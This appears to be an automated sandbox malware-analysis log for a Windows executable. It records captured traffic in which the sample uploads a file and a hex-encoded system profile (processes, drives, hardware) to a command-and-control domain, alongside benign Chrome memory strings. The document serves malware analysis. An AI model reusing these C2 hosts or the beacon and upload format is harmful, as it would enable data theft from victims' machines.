Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: /Content-Length: 32572Content-Type: multipart/form-data; boundary=------------------------aURsCG5EBMGCYHjDHvtTrOData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 55 52 73 43 47 35 45 42 4d 47 43 59 48 6a 44 48 76 74 54 72 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 79 6f 7a 61 6e 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 00 f6 b8 b8 74 6b 9e d3 40 e4 af e8 d8 f2 3f a8 4d 74 e9 58 39 41 b6 7a 93 42 27 da 48 a4 81 58 79 11 c7 83 ed b5 45 34 ef 49 c9 62 4a d1 81 6e df 01 5c 20 4c 50 0c a7 6b f6 e6 e0 3c 11 8a 3c 4f 8e f9 58 7d e7 82 78 26 c7 b6 6a 4a 48 cf 16 fd aa b8 bd 34 4c ce 32 57 af 84 01 ec d4 39 18 d4 e2 4c 69 18 02 72 9a 74 31 4e ad ed af 5d 11 d3 d1 f2 d8 5e 40 f7 74 af 1f ce fa ef d7 6b c0 6e 10 43 2a 82 ac f5 a3 0f 11 b4 cb 8e 8d 57 e4 fa 57 ef e4 4c 5b 87 a5 b2 10 ed 01 2e 1f ea 34 62 28 f2 2c af 33 c2 70 7c e2 f8 86 b4 53 b0 e3 0d c6 3e 7b ee b4 da 73 a1 cb 3a 94 a5 38 21 1a 0c e0 e7 c0 bc 21 b6 7d 51 37 45 d0 71 4b 33 af 93 ff 29 2c 3c 6e e2 1f fb 51 2d 32 c0 06 5e d1 2c a0 d3 26 90 e0 d8 a0 c2 a4 1f 5f ef 31 26 08 26 c2 08 1c 4f a6 13 41 82 06 50 d3 30 f2 e0 a5 4e 20 e8 de 06 03 8d b0 c7 9a a2 d6 0c 9f 4a 48 31 d5 45 9b c9 88 bd 06 e2 27 be 4b e8 5e 5c a5 0e 4e ae 05 65 d2 4b c3 40 47 24 a9 21 ab 25 72 f3 cd 51 6a c7 49 45 62 11 20 3a d5 59 74 44 03 fc cb ff bc c9 5e 77 bc 74 91 46 73 ec 57 91 e6 2b 62 c4 fa 53 31 b5 aa 37 45 22 f7 1f 00 15 41 9d 74 3f 99 d7 9a 3a 4f d0 0f 3e 7f d8 7a 02 c8 13 f1 35 79 8d 68 88 7a ce 26 64 5f f1 57 26 c2 00 81 c2 6a f9 13 5d ab 0d 10 65 f8 e8 23 8d f4 2b f1 e7 ad 4b c6 5d cc 0d bb dc df f9 cb 65 c5 db bf df b4 79 24 36 2c 77 ce 6b aa 6c d0 fd 44 70 f2 16 09 54 87 51 b4 e6 5a 29 1b ac 21 23 18 80 22 cf 94 5c 42 98 6f 04 7b 9b 8c 82 f2 1d 85 ec 54 d4 29 dc a9 9a b3 23 bd 06 68 57 1f 3b 69 97 1a 7e c3 42 99 31 95 58 80 01 cb 12 0b 42 44 b4 9c 30 3a 2c 60 49 a0 14 42 e6 60 84 fc a1 0e 90 06 f5 70 b6 a3 18 19 77 b6 93 83 b4 b7 54 d5 78 d4 af 12 85 ab c4 db 01 b0 3c 7e 7b 8d 02 68 24 be 2b 20 aa ef 9e 94 b7 55 84 a6 c5 08 ce cc 1a 97 1e f4 8d 9b 96 16 d6 ab 15 69 6c aa 5a 03 42 7a 9d 1b 7f 6d a9 52 f6 44 09 21 0e 80 be 3c e4 ed 4f 68 1b dc 28 ea fd f9 b4 17 1a a8 55 1c 8b af 35 fb bf 44 25 64 05 17 06 a5 dc 82 ed b6 63 d6 6f d9 df be e8 c4 c9 80 d2 a7 d7 3f f5 c4 50 9e bf 81 1f 6e 31 dd e3 b6 4f ff f7 13 1d d0 a9 ab e2 75 38 a8 57 b0 e1 af 61 2b db 8c 5e f4 af 5f 4c 77 ba a4 f0 ff be bb 5f 82 a2 9d 73 95 3c 09 69 aa a8 f6 c4 fb a3 e7 d1 34 19 8e cc 85 4f af 1b 7a 8f d1 90 c5 49 25 bc 94 84 5d 27 f0 c7 92 ef 90 f6 ef 4e 36 df 1a 04 14 fc 01 23 a4 48 7f 34 ed f0 2d 4e c6 da c3 69 0b 7e 13 79 bb c8 41 c2 a8 34 2a 2f 6c 3f a0 70 41 96 04 cc 1b 4e 3f df 34 c4 d1
Source: global traffic	HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: /Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 48 69 47 47 48 45 46 45 67 6c 59 43 7a 37 36 67 31 37 33 34 35 39 34 34 33 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "HiGGHEFEglYCz76g1734594439", "data": "Done2" }

Source: Joe Sandbox View	IP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 194.87.47.113 194.87.47.113

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=HiGGHEFEglYCz76g1734594439 HTTP/1.1Host: home.twentytk20pn.topAccept: /

Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.1694215237.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1694137207.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693894119.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000A.00000003.1694215237.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1694137207.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693894119.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.1715957583.000077D4024D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.twentytk20pn.top
Source: global traffic	DNS traffic detected: DNS query: twentytk20pn.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 559914Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 34 34 33 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2

Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/30782
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452)
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/35025
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
